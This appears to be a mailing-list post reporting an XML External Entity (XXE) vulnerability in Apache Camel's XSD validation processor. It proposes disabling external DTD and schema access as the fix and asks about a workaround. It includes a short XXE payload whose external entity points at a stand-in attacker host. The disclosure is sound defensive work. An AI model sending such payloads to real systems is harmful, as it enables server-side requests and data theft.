
XML External Entity (XXE) - validator vulnerability?

Dear All,
We are using the XSD validation processor from the camel-core library.


Our penetration tests found that the application can be attacked via "XML External Entity (XXE)" (https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Validator).

We think that the classes affected by this vulnerability are:


Method SchemaReader.createSchemaFactory should also set the property "factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");"

Method ValidatingProcessor.doProcess should set the properties on the validator object:

Validator validator = schema.newValidator();
//prevent XXE attack
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

If we try to validate the following XML against the XSD, we can see that Camel tries to access an external site (attackers.site in this example):

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://attackers.site:53/TEST";>

Setting the mentioned properties should do the trick.


I would like to ask whether this will be filed as a security bug in Camel and whether it will be fixed in a future version.

Is there a workaround we can use, such as writing our own implementation of ValidatingProcessor? Is that possible?


Best regards

Karel Jelínek
Unicorn Systems